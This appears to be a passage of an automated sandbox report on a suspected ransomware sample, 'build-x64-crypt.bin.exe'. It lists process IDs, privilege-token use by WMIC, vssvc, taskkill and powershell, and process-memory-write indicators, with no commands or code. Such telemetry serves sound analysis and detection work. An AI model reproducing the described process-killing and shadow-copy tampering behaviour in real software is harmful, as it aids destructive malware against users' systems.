1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe
1304	build-x64-crypt.bin.exe

Suspicious use of AdjustPrivilegeToken 132 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1000	WMIC.exe
Token: SeSecurityPrivilege	1000	WMIC.exe
Token: SeTakeOwnershipPrivilege	1000	WMIC.exe
Token: SeLoadDriverPrivilege	1000	WMIC.exe
Token: SeSystemProfilePrivilege	1000	WMIC.exe
Token: SeSystemtimePrivilege	1000	WMIC.exe
Token: SeProfSingleProcessPrivilege	1000	WMIC.exe
Token: SeIncBasePriorityPrivilege	1000	WMIC.exe
Token: SeCreatePagefilePrivilege	1000	WMIC.exe
Token: SeBackupPrivilege	1000	WMIC.exe
Token: SeRestorePrivilege	1000	WMIC.exe
Token: SeShutdownPrivilege	1000	WMIC.exe
Token: SeDebugPrivilege	1000	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1000	WMIC.exe
Token: SeRemoteShutdownPrivilege	1000	WMIC.exe
Token: SeUndockPrivilege	1000	WMIC.exe
Token: SeManageVolumePrivilege	1000	WMIC.exe
Token: 33	1000	WMIC.exe
Token: 34	1000	WMIC.exe
Token: 35	1000	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1000	WMIC.exe
Token: SeSecurityPrivilege	1000	WMIC.exe
Token: SeTakeOwnershipPrivilege	1000	WMIC.exe
Token: SeLoadDriverPrivilege	1000	WMIC.exe
Token: SeSystemProfilePrivilege	1000	WMIC.exe
Token: SeSystemtimePrivilege	1000	WMIC.exe
Token: SeProfSingleProcessPrivilege	1000	WMIC.exe
Token: SeIncBasePriorityPrivilege	1000	WMIC.exe
Token: SeCreatePagefilePrivilege	1000	WMIC.exe
Token: SeBackupPrivilege	1000	WMIC.exe
Token: SeRestorePrivilege	1000	WMIC.exe
Token: SeShutdownPrivilege	1000	WMIC.exe
Token: SeDebugPrivilege	1000	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1000	WMIC.exe
Token: SeRemoteShutdownPrivilege	1000	WMIC.exe
Token: SeUndockPrivilege	1000	WMIC.exe
Token: SeManageVolumePrivilege	1000	WMIC.exe
Token: 33	1000	WMIC.exe
Token: 34	1000	WMIC.exe
Token: 35	1000	WMIC.exe
Token: SeBackupPrivilege	1052	vssvc.exe
Token: SeRestorePrivilege	1052	vssvc.exe
Token: SeAuditPrivilege	1052	vssvc.exe
Token: SeDebugPrivilege	1976	taskkill.exe
Token: SeDebugPrivilege	852	taskkill.exe
Token: SeDebugPrivilege	1404	taskkill.exe
Token: SeDebugPrivilege	1388	taskkill.exe
Token: SeDebugPrivilege	220	taskkill.exe
Token: SeDebugPrivilege	1484	taskkill.exe
Token: SeDebugPrivilege	1740	taskkill.exe
Token: SeDebugPrivilege	632	taskkill.exe
Token: SeDebugPrivilege	1520	taskkill.exe
Token: SeDebugPrivilege	1584	taskkill.exe
Token: SeDebugPrivilege	1928	taskkill.exe
Token: SeDebugPrivilege	2024	taskkill.exe
Token: SeDebugPrivilege	1260	taskkill.exe
Token: SeDebugPrivilege	1400	taskkill.exe
Token: SeDebugPrivilege	212	taskkill.exe
Token: SeDebugPrivilege	1000	taskkill.exe
Token: SeDebugPrivilege	1836	taskkill.exe
Token: SeDebugPrivilege	764	taskkill.exe
Token: SeDebugPrivilege	1636	taskkill.exe
Token: SeDebugPrivilege	1632	taskkill.exe
Token: SeDebugPrivilege	1932	taskkill.exe
Token: SeDebugPrivilege	1948	taskkill.exe
Token: SeDebugPrivilege	1940	taskkill.exe
Token: SeDebugPrivilege	324	taskkill.exe
Token: SeDebugPrivilege	1536	taskkill.exe
Token: SeDebugPrivilege	1808	taskkill.exe
Token: SeDebugPrivilege	864	taskkill.exe
Token: SeDebugPrivilege	1824	taskkill.exe
Token: SeDebugPrivilege	704	taskkill.exe
Token: SeDebugPrivilege	1212	taskkill.exe
Token: SeDebugPrivilege	1640	taskkill.exe
Token: SeDebugPrivilege	1884	taskkill.exe
Token: SeDebugPrivilege	1768	taskkill.exe
Token: SeDebugPrivilege	1828	taskkill.exe
Token: SeDebugPrivilege	1328	taskkill.exe
Token: SeDebugPrivilege	904	taskkill.exe
Token: SeDebugPrivilege	824	taskkill.exe
Token: SeDebugPrivilege	1600	taskkill.exe
Token: SeDebugPrivilege	1968	taskkill.exe
Token: SeDebugPrivilege	1092	taskkill.exe
Token: SeDebugPrivilege	1492	taskkill.exe
Token: SeDebugPrivilege	2020	taskkill.exe
Token: SeDebugPrivilege	1936	taskkill.exe
Token: SeDebugPrivilege	1736	taskkill.exe
Token: SeDebugPrivilege	1016	taskkill.exe
Token: SeDebugPrivilege	1032	taskkill.exe
Token: SeDebugPrivilege	1560	taskkill.exe
Token: SeDebugPrivilege	1908	taskkill.exe
Token: SeDebugPrivilege	1956	taskkill.exe
Token: SeDebugPrivilege	1256	taskkill.exe
Token: SeDebugPrivilege	1976	taskkill.exe
Token: SeDebugPrivilege	1476	taskkill.exe
Token: SeDebugPrivilege	1160	taskkill.exe
Token: SeDebugPrivilege	1608	taskkill.exe
Token: SeDebugPrivilege	204	taskkill.exe
Token: SeDebugPrivilege	220	taskkill.exe
Token: SeDebugPrivilege	1840	taskkill.exe
Token: SeDebugPrivilege	1740	taskkill.exe
Token: SeDebugPrivilege	1076	taskkill.exe
Token: SeDebugPrivilege	1580	taskkill.exe
Token: SeDebugPrivilege	1584	taskkill.exe
Token: SeDebugPrivilege	1928	taskkill.exe
Token: SeDebugPrivilege	1984	taskkill.exe
Token: SeDebugPrivilege	1768	taskkill.exe
Token: SeDebugPrivilege	236	taskkill.exe
Token: SeDebugPrivilege	480	taskkill.exe
Token: SeDebugPrivilege	216	taskkill.exe
Token: SeDebugPrivilege	1484	taskkill.exe
Token: SeDebugPrivilege	1792	taskkill.exe
Token: SeDebugPrivilege	572	taskkill.exe
Token: SeDebugPrivilege	1520	taskkill.exe
Token: SeDebugPrivilege	1700	taskkill.exe
Token: SeDebugPrivilege	1488	taskkill.exe
Token: SeDebugPrivilege	1572	taskkill.exe
Token: SeDebugPrivilege	1384	taskkill.exe
Token: SeDebugPrivilege	1736	taskkill.exe
Token: SeDebugPrivilege	1016	taskkill.exe
Token: SeDebugPrivilege	1508	taskkill.exe
Token: SeDebugPrivilege	1796	taskkill.exe
Token: SeDebugPrivilege	1908	taskkill.exe
Token: SeDebugPrivilege	1868	taskkill.exe
Token: SeDebugPrivilege	1816	taskkill.exe
Token: SeDebugPrivilege	792	taskkill.exe
Token: SeDebugPrivilege	1776	taskkill.exe
Token: SeDebugPrivilege	784	taskkill.exe
Token: SeDebugPrivilege	1824	taskkill.exe
Token: SeDebugPrivilege	1388	taskkill.exe
Token: SeDebugPrivilege	208	taskkill.exe
Token: SeDebugPrivilege	2024	powershell.exe

Suspicious use of WriteProcessMemory 597 IoCs

description	pid	Process	procid_target
PID 1304 wrote to memory of 1484	1304	build-x64-crypt.bin.exe	25
PID 1304 wrote to memory of 1484	1304	build-x64-crypt.bin.exe	25
PID 1304 wrote to memory of 1484	1304	build-x64-crypt.bin.exe	25
PID 1484 wrote to memory of 1000	1484	cmd.exe	27
PID 1484 wrote to memory of 1000	1484	cmd.exe	27
PID 1484 wrote to memory of 1000	1484	cmd.exe	27
PID 1304 wrote to memory of 1836	1304	build-x64-crypt.bin.exe	31
PID 1304 wrote to memory of 1836	1304	build-x64-crypt.bin.exe	31
PID 1304 wrote to memory of 1836	1304	build-x64-crypt.bin.exe	31
PID 1836 wrote to memory of 1840	1836	cmd.exe	33
PID 1836 wrote to memory of 1840	1836	cmd.exe	33
PID 1836 wrote to memory of 1840	1836	cmd.exe	33
PID 1304 wrote to memory of 652	1304	build-x64-crypt.bin.exe	34
PID 1304 wrote to memory of 652	1304	build-x64-crypt.bin.exe	34
PID 1304 wrote to memory of 652	1304	build-x64-crypt.bin.exe	34
PID 652 wrote to memory of 572	652	cmd.exe	36
PID 652 wrote to memory of 572	652	cmd.exe	36
PID 652 wrote to memory of 572	652	cmd.exe	36
PID 1304 wrote to memory of 1320	1304	build-x64-crypt.bin.exe	37
PID 1304 wrote to memory of 1320	1304	build-x64-crypt.bin.exe	37
PID 1304 wrote to memory of 1320	1304	build-x64-crypt.bin.exe	37
PID 1320 wrote to memory of 1412	1320	cmd.exe	39
PID 1320 wrote to memory of 1412	1320	cmd.exe	39
PID 1320 wrote to memory of 1412	1320	cmd.exe	39
PID 1304 wrote to memory of 1520	1304	build-x64-crypt.bin.exe	40
PID 1304 wrote to memory of 1520	1304	build-x64-crypt.bin.exe	40
PID 1304 wrote to memory of 1520	1304	build-x64-crypt.bin.exe	40
PID 1520 wrote to memory of 1636	1520	cmd.exe	42
PID 1520 wrote to memory of 1636	1520	cmd.exe	42
PID 1520 wrote to memory of 1636	1520	cmd.exe	42
PID 1304 wrote to memory of 1584	1304	build-x64-crypt.bin.exe	43
PID 1304 wrote to memory of 1584	1304	build-x64-crypt.bin.exe	43
PID 1304 wrote to memory of 1584	1304	build-x64-crypt.bin.exe	43
PID 1584 wrote to memory of 1632	1584	cmd.exe	45
PID 1584 wrote to memory of 1632	1584	cmd.exe	45
PID 1584 wrote to memory of 1632	1584	cmd.exe	45
PID 1304 wrote to memory of 1880	1304	build-x64-crypt.bin.exe	46
PID 1304 wrote to memory of 1880	1304	build-x64-crypt.bin.exe	46
PID 1304 wrote to memory of 1880	1304	build-x64-crypt.bin.exe	46
PID 1880 wrote to memory of 1884	1880	cmd.exe	48
PID 1880 wrote to memory of 1884	1880	cmd.exe	48
PID 1880 wrote to memory of 1884	1880	cmd.exe	48
PID 1304 wrote to memory of 1888	1304	build-x64-crypt.bin.exe	49
PID 1304 wrote to memory of 1888	1304	build-x64-crypt.bin.exe	49
PID 1304 wrote to memory of 1888	1304	build-x64-crypt.bin.exe	49
PID 1888 wrote to memory of 1976	1888	cmd.exe	51
PID 1888 wrote to memory of 1976	1888	cmd.exe	51
PID 1888 wrote to memory of 1976	1888	cmd.exe	51
PID 1304 wrote to memory of 1940	1304	build-x64-crypt.bin.exe	52
PID 1304 wrote to memory of 1940	1304	build-x64-crypt.bin.exe	52
PID 1304 wrote to memory of 1940	1304	build-x64-crypt.bin.exe	52
PID 1940 wrote to memory of 852	1940	cmd.exe	54
PID 1940 wrote to memory of 852	1940	cmd.exe	54
PID 1940 wrote to memory of 852	1940	cmd.exe	54
PID 1304 wrote to memory of 836	1304	build-x64-crypt.bin.exe	55
PID 1304 wrote to memory of 836	1304	build-x64-crypt.bin.exe	55
PID 1304 wrote to memory of 836	1304	build-x64-crypt.bin.exe	55
PID 836 wrote to memory of 1404	836	cmd.exe	57
PID 836 wrote to memory of 1404	836	cmd.exe	57
PID 836 wrote to memory of 1404	836	cmd.exe	57
PID 1304 wrote to memory of 1512	1304	build-x64-crypt.bin.exe	58
PID 1304 wrote to memory of 1512	1304	build-x64-crypt.bin.exe	58
PID 1304 wrote to memory of 1512	1304	build-x64-crypt.bin.exe	58
PID 1512 wrote to memory of 1388	1512	cmd.exe	60
PID 1512 wrote to memory of 1388	1512	cmd.exe	60
PID 1512 wrote to memory of 1388	1512	cmd.exe	60
PID 1304 wrote to memory of 1808	1304	build-x64-crypt.bin.exe	61
PID 1304 wrote to memory of 1808	1304	build-x64-crypt.bin.exe	61
PID 1304 wrote to memory of 1808	1304	build-x64-crypt.bin.exe	61
PID 1808 wrote to memory of 220	1808	cmd.exe	63
PID 1808 wrote to memory of 220	1808	cmd.exe	63
PID 1808 wrote to memory of 220	1808	cmd.exe	63
PID 1304 wrote to memory of 784	1304	build-x64-crypt.bin.exe	64
PID 1304 wrote to memory of 784	1304	build-x64-crypt.bin.exe	64
PID 1304 wrote to memory of 784	1304	build-x64-crypt.bin.exe	64
PID 784 wrote to memory of 1484	784	cmd.exe	66
PID 784 wrote to memory of 1484	784	cmd.exe	66
PID 784 wrote to memory of 1484	784	cmd.exe	66
PID 1304 wrote to memory of 1780	1304	build-x64-crypt.bin.exe	67
PID 1304 wrote to memory of 1780	1304	build-x64-crypt.bin.exe	67
PID 1304 wrote to memory of 1780	1304	build-x64-crypt.bin.exe	67
PID 1780 wrote to memory of 1740	1780	cmd.exe	69
PID 1780 wrote to memory of 1740	1780	cmd.exe	69
PID 1780 wrote to memory of 1740	1780	cmd.exe	69
PID 1304 wrote to memory of 572	1304	build-x64-crypt.bin.exe	70
PID 1304 wrote to memory of 572	1304	build-x64-crypt.bin.exe	70
PID 1304 wrote to memory of 572	1304	build-x64-crypt.bin.exe	70
PID 572 wrote to memory of 632	572	cmd.exe	72
PID 572 wrote to memory of 632	572	cmd.exe	72
PID 572 wrote to memory of 632	572	cmd.exe	72
PID 1304 wrote to memory of 1212	1304	build-x64-crypt.bin.exe	73
PID 1304 wrote to memory of 1212	1304	build-x64-crypt.bin.exe	73
PID 1304 wrote to memory of 1212	1304	build-x64-crypt.bin.exe	73
PID 1212 wrote to memory of 1520	1212	cmd.exe	75
PID 1212 wrote to memory of 1520	1212	cmd.exe	75
PID 1212 wrote to memory of 1520	1212	cmd.exe	75
PID 1304 wrote to memory of 1552	1304	build-x64-crypt.bin.exe	76
PID 1304 wrote to memory of 1552	1304	build-x64-crypt.bin.exe	76
PID 1304 wrote to memory of 1552	1304	build-x64-crypt.bin.exe	76
PID 1552 wrote to memory of 1584	1552	cmd.exe	78
PID 1552 wrote to memory of 1584	1552	cmd.exe	78
PID 1552 wrote to memory of 1584	1552	cmd.exe	78
PID 1304 wrote to memory of 1884	1304	build-x64-crypt.bin.exe	79
PID 1304 wrote to memory of 1884	1304	build-x64-crypt.bin.exe	79
PID 1304 wrote to memory of 1884	1304	build-x64-crypt.bin.exe	79
PID 1884 wrote to memory of 1928	1884	cmd.exe	81
PID 1884 wrote to memory of 1928	1884	cmd.exe	81
PID 1884 wrote to memory of 1928	1884	cmd.exe	81
PID 1304 wrote to memory of 1976	1304	build-x64-crypt.bin.exe	82
PID 1304 wrote to memory of 1976	1304	build-x64-crypt.bin.exe	82
PID 1304 wrote to memory of 1976	1304	build-x64-crypt.bin.exe	82
PID 1976 wrote to memory of 2024	1976	cmd.exe	84
PID 1976 wrote to memory of 2024	1976	cmd.exe	84
PID 1976 wrote to memory of 2024	1976	cmd.exe	84
PID 1304 wrote to memory of 852	1304	build-x64-crypt.bin.exe	85
PID 1304 wrote to memory of 852	1304	build-x64-crypt.bin.exe	85
PID 1304 wrote to memory of 852	1304	build-x64-crypt.bin.exe	85
PID 852 wrote to memory of 1260	852	cmd.exe	87
PID 852 wrote to memory of 1260	852	cmd.exe	87
PID 852 wrote to memory of 1260	852	cmd.exe	87
PID 1304 wrote to memory of 1404	1304	build-x64-crypt.bin.exe	88
PID 1304 wrote to memory of 1404	1304	build-x64-crypt.bin.exe	88
PID 1304 wrote to memory of 1404	1304	build-x64-crypt.bin.exe	88
PID 1404 wrote to memory of 1400	1404	cmd.exe	90
PID 1404 wrote to memory of 1400	1404	cmd.exe	90
PID 1404 wrote to memory of 1400	1404	cmd.exe	90
PID 1304 wrote to memory of 1388	1304	build-x64-crypt.bin.exe	91
PID 1304 wrote to memory of 1388	1304	build-x64-crypt.bin.exe	91
PID 1304 wrote to memory of 1388	1304	build-x64-crypt.bin.exe	91
PID 1388 wrote to memory of 212	1388	cmd.exe	93
PID 1388 wrote to memory of 212	1388	cmd.exe	93
PID 1388 wrote to memory of 212	1388	cmd.exe	93
PID 1304 wrote to memory of 220	1304	build-x64-crypt.bin.exe	94
PID 1304 wrote to memory of 220	1304	build-x64-crypt.bin.exe	94
PID 1304 wrote to memory of 220	1304	build-x64-crypt.bin.exe	94
PID 220 wrote to memory of 1000	220	cmd.exe	96
PID 220 wrote to memory of 1000	220	cmd.exe	96
PID 220 wrote to memory of 1000	220	cmd.exe	96
PID 1304 wrote to memory of 1484	1304	build-x64-crypt.bin.exe	97
PID 1304 wrote to memory of 1484	1304	build-x64-crypt.bin.exe	97
PID 1304 wrote to memory of 1484	1304	build-x64-crypt.bin.exe	97
PID 1484 wrote to memory of 1836	1484	cmd.exe	99
PID 1484 wrote to memory of 1836	1484	cmd.exe	99
PID 1484 wrote to memory of 1836	1484	cmd.exe	99
PID 1304 wrote to memory of 1740	1304	build-x64-crypt.bin.exe	100
PID 1304 wrote to memory of 1740	1304	build-x64-crypt.bin.exe	100
PID 1304 wrote to memory of 1740	1304	build-x64-crypt.bin.exe	100
PID 1740 wrote to memory of 764	1740	cmd.exe	102
PID 1740 wrote to memory of 764	1740	cmd.exe	102
PID 1740 wrote to memory of 764	1740	cmd.exe	102
PID 1304 wrote to memory of 632	1304	build-x64-crypt.bin.exe	103
PID 1304 wrote to memory of 632	1304	build-x64-crypt.bin.exe	103
PID 1304 wrote to memory of 632	1304	build-x64-crypt.bin.exe	103
PID 632 wrote to memory of 1636	632	cmd.exe	105
PID 632 wrote to memory of 1636	632	cmd.exe	105
PID 632 wrote to memory of 1636	632	cmd.exe	105
PID 1304 wrote to memory of 1520	1304	build-x64-crypt.bin.exe	106
PID 1304 wrote to memory of 1520	1304	build-x64-crypt.bin.exe	106
PID 1304 wrote to memory of 1520	1304	build-x64-crypt.bin.exe	106
PID 1520 wrote to memory of 1632	1520	cmd.exe	108
PID 1520 wrote to memory of 1632	1520	cmd.exe	108
PID 1520 wrote to memory of 1632	1520	cmd.exe	108
PID 1304 wrote to memory of 1584	1304	build-x64-crypt.bin.exe	109
PID 1304 wrote to memory of 1584	1304	build-x64-crypt.bin.exe	109
PID 1304 wrote to memory of 1584	1304	build-x64-crypt.bin.exe	109
PID 1584 wrote to memory of 1932	1584	cmd.exe	111
PID 1584 wrote to memory of 1932	1584	cmd.exe	111
PID 1584 wrote to memory of 1932	1584	cmd.exe	111
PID 1304 wrote to memory of 1928	1304	build-x64-crypt.bin.exe	112
PID 1304 wrote to memory of 1928	1304	build-x64-crypt.bin.exe	112
PID 1304 wrote to memory of 1928	1304	build-x64-crypt.bin.exe	112
PID 1928 wrote to memory of 1948	1928	cmd.exe	114
PID 1928 wrote to memory of 1948	1928	cmd.exe	114
PID 1928 wrote to memory of 1948	1928	cmd.exe	114
PID 1304 wrote to memory of 2024	1304	build-x64-crypt.bin.exe	115
PID 1304 wrote to memory of 2024	1304	build-x64-crypt.bin.exe	115
PID 1304 wrote to memory of 2024	1304	build-x64-crypt.bin.exe	115
PID 2024 wrote to memory of 1940	2024	cmd.exe	117
PID 2024 wrote to memory of 1940	2024	cmd.exe	117
PID 2024 wrote to memory of 1940	2024	cmd.exe	117
PID 1304 wrote to memory of 1260	1304	build-x64-crypt.bin.exe	118
PID 1304 wrote to memory of 1260	1304	build-x64-crypt.bin.exe	118
PID 1304 wrote to memory of 1260	1304	build-x64-crypt.bin.exe	118
PID 1260 wrote to memory of 324	1260	cmd.exe	120
PID 1260 wrote to memory of 324	1260	cmd.exe	120
PID 1260 wrote to memory of 324	1260	cmd.exe	120
PID 1304 wrote to memory of 1400	1304	build-x64-crypt.bin.exe	121
PID 1304 wrote to memory of 1400	1304	build-x64-crypt.bin.exe	121
PID 1304 wrote to memory of 1400	1304	build-x64-crypt.bin.exe	121
PID 1400 wrote to memory of 1536	1400	cmd.exe	123
PID 1400 wrote to memory of 1536	1400	cmd.exe	123
PID 1400 wrote to memory of 1536	1400	cmd.exe	123
PID 1304 wrote to memory of 212	1304	build-x64-crypt.bin.exe	124
PID 1304 wrote to memory of 212	1304	build-x64-crypt.bin.exe	124
PID 1304 wrote to memory of 212	1304	build-x64-crypt.bin.exe	124
PID 212 wrote to memory of 1808	212	cmd.exe	126
PID 212 wrote to memory of 1808	212	cmd.exe	126
PID 212 wrote to memory of 1808	212	cmd.exe	126
PID 1304 wrote to memory of 1000	1304	build-x64-crypt.bin.exe	127
PID 1304 wrote to memory of 1000	1304	build-x64-crypt.bin.exe	127
PID 1304 wrote to memory of 1000	1304	build-x64-crypt.bin.exe	127
PID 1000 wrote to memory of 864	1000	cmd.exe	129
PID 1000 wrote to memory of 864	1000	cmd.exe	129
PID 1000 wrote to memory of 864	1000	cmd.exe	129
PID 1304 wrote to memory of 1836	1304	build-x64-crypt.bin.exe	130
PID 1304 wrote to memory of 1836	1304	build-x64-crypt.bin.exe	130
PID 1304 wrote to memory of 1836	1304	build-x64-crypt.bin.exe	130
PID 1836 wrote to memory of 1824	1836	cmd.exe	132
PID 1836 wrote to memory of 1824	1836	cmd.exe	132
PID 1836 wrote to memory of 1824	1836	cmd.exe	132
PID 1304 wrote to memory of 764	1304	build-x64-crypt.bin.exe	133
PID 1304 wrote to memory of 764	1304	build-x64-crypt.bin.exe	133
PID 1304 wrote to memory of 764	1304	build-x64-crypt.bin.exe	133
PID 764 wrote to memory of 704	764	cmd.exe	135
PID 764 wrote to memory of 704	764	cmd.exe	135
PID 764 wrote to memory of 704	764	cmd.exe	135
PID 1304 wrote to memory of 1636	1304	build-x64-crypt.bin.exe	136
PID 1304 wrote to memory of 1636	1304	build-x64-crypt.bin.exe	136
PID 1304 wrote to memory of 1636	1304	build-x64-crypt.bin.exe	136
PID 1636 wrote to memory of 1212	1636	cmd.exe	138
PID 1636 wrote to memory of 1212	1636	cmd.exe	138
PID 1636 wrote to memory of 1212	1636	cmd.exe	138
PID 1304 wrote to memory of 1632	1304	build-x64-crypt.bin.exe	139
PID 1304 wrote to memory of 1632	1304	build-x64-crypt.bin.exe	139
PID 1304 wrote to memory of 1632	1304	build-x64-crypt.bin.exe	139
PID 1632 wrote to memory of 1640	1632	cmd.exe	141
PID 1632 wrote to memory of 1640	1632	cmd.exe	141
PID 1632 wrote to memory of 1640	1632	cmd.exe	141
PID 1304 wrote to memory of 1932	1304	build-x64-crypt.bin.exe	142
PID 1304 wrote to memory of 1932	1304	build-x64-crypt.bin.exe	142
PID 1304 wrote to memory of 1932	1304	build-x64-crypt.bin.exe	142
PID 1932 wrote to memory of 1884	1932	cmd.exe	144
PID 1932 wrote to memory of 1884	1932	cmd.exe	144
PID 1932 wrote to memory of 1884	1932	cmd.exe	144
PID 1304 wrote to memory of 1948	1304	build-x64-crypt.bin.exe	145
PID 1304 wrote to memory of 1948	1304	build-x64-crypt.bin.exe	145
PID 1304 wrote to memory of 1948	1304	build-x64-crypt.bin.exe	145
PID 1948 wrote to memory of 1976	1948	cmd.exe	147
PID 1948 wrote to memory of 1976	1948	cmd.exe	147
PID 1948 wrote to memory of 1976	1948	cmd.exe	147
PID 1304 wrote to memory of 1572	1304	build-x64-crypt.bin.exe	148
PID 1304 wrote to memory of 1572	1304	build-x64-crypt.bin.exe	148
PID 1304 wrote to memory of 1572	1304	build-x64-crypt.bin.exe	148
PID 1572 wrote to memory of 1984	1572	cmd.exe	150
PID 1572 wrote to memory of 1984	1572	cmd.exe	150
PID 1572 wrote to memory of 1984	1572	cmd.exe	150
PID 1304 wrote to memory of 1936	1304	build-x64-crypt.bin.exe	151
PID 1304 wrote to memory of 1936	1304	build-x64-crypt.bin.exe	151
PID 1304 wrote to memory of 1936	1304	build-x64-crypt.bin.exe	151
PID 1936 wrote to memory of 1768	1936	cmd.exe	153
PID 1936 wrote to memory of 1768	1936	cmd.exe	153
PID 1936 wrote to memory of 1768	1936	cmd.exe	153
PID 1304 wrote to memory of 1124	1304	build-x64-crypt.bin.exe	154
PID 1304 wrote to memory of 1124	1304	build-x64-crypt.bin.exe	154
PID 1304 wrote to memory of 1124	1304	build-x64-crypt.bin.exe	154
PID 1124 wrote to memory of 232	1124	cmd.exe	156
PID 1124 wrote to memory of 232	1124	cmd.exe	156
PID 1124 wrote to memory of 232	1124	cmd.exe	156
PID 1304 wrote to memory of 1400	1304	build-x64-crypt.bin.exe	157
PID 1304 wrote to memory of 1400	1304	build-x64-crypt.bin.exe	157
PID 1304 wrote to memory of 1400	1304	build-x64-crypt.bin.exe	157
PID 1400 wrote to memory of 1828	1400	cmd.exe	159
PID 1400 wrote to memory of 1828	1400	cmd.exe	159
PID 1400 wrote to memory of 1828	1400	cmd.exe	159
PID 1304 wrote to memory of 212	1304	build-x64-crypt.bin.exe	160
PID 1304 wrote to memory of 212	1304	build-x64-crypt.bin.exe	160
PID 1304 wrote to memory of 212	1304	build-x64-crypt.bin.exe	160
PID 212 wrote to memory of 1328	212	cmd.exe	162
PID 212 wrote to memory of 1328	212	cmd.exe	162
PID 212 wrote to memory of 1328	212	cmd.exe	162
PID 1304 wrote to memory of 1604	1304	build-x64-crypt.bin.exe	163
PID 1304 wrote to memory of 1604	1304	build-x64-crypt.bin.exe	163
PID 1304 wrote to memory of 1604	1304	build-x64-crypt.bin.exe	163
PID 1604 wrote to memory of 904	1604	cmd.exe	165
PID 1604 wrote to memory of 904	1604	cmd.exe	165
PID 1604 wrote to memory of 904	1604	cmd.exe	165
PID 1304 wrote to memory of 340	1304	build-x64-crypt.bin.exe	166
PID 1304 wrote to memory of 340	1304	build-x64-crypt.bin.exe	166
PID 1304 wrote to memory of 340	1304	build-x64-crypt.bin.exe	166
PID 340 wrote to memory of 824	340	cmd.exe	168
PID 340 wrote to memory of 824	340	cmd.exe	168
PID 340 wrote to memory of 824	340	cmd.exe	168
PID 1304 wrote to memory of 764	1304	build-x64-crypt.bin.exe	169
PID 1304 wrote to memory of 764	1304	build-x64-crypt.bin.exe	169
PID 1304 wrote to memory of 764	1304	build-x64-crypt.bin.exe	169
PID 764 wrote to memory of 1600	764	cmd.exe	171
